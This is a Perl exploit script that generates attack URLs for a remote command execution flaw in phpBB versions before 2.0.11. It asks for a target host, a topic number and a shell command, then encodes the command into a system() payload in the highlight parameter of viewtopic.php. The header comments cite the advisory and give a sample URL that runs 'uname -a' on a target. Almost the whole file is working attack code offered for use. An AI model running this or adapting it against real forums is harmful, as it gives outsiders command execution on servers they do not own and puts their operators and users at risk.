#!/usr/bin/perl -w
# Code that automate the creation of the URL to exploit phpBB < 2.0.11
# Discovered by Zeelock and descibed at http://www.securityfocus.com/bid/10701
# and http://www.packetstormsecurity.org/0411-exploits/phpbb2011.txt
# Fix: http://www.securityfocus.com/bid/10701/solution/
#
# Example of execution:
#
# Insert the hostname of the target, with, if necessary,
# the directory where phpBB is installed (ex. http://www.hostname.com/phpbb/): http://www.hostname.com/phpbb/
# Insert a valid topic number (viewtopic.php?t=[topic_number]): 542
# Insert the command to execute on the target: uname -a
# This is the final URL: http://www.hostname.com/phpbb/viewtopic.php?t=542&highlight=%2527%252esystem(chr(117)
# %252echr(110)%252echr(97)%252echr(109)%252echr(101)%252echr(32)%252echr(45)%252echr(97))%252e%2527
#
# by albythebest - http://albythebest.altervista.org/

print "#########################################################\n";
print "# phpBB < 2.0.11 Vulnerability URL Creator - BID: 10701 #\n";
print "#########################################################\n";
print "           http://albythebest.altervista.org/\n\n";
print "Insert the hostname of the target, with, if necessary,
the directory where phpBB is installed (ex. http://www.hostname.com/phpbb/): ";
$host=<stdin>;
chomp $host;
print "Insert a valid topic number (viewtopic.php?t=[topic_number]): ";
$topic=<stdin>;
chomp $topic;
print "Insert the command to execute on the target: ";
$comando=<stdin>;
chomp $comando;
@command=split(//,$comando);
print "This is the final URL: ",$host,"viewtopic.php?t=",$topic,"&highlight=%2527%252esystem(chr(";
print ord("$command[0]");
for($indice=1;$indice<@command;$indice++) {
  print ")%252echr(",ord("$command[$indice]");
}
print "))%252e%2527\n";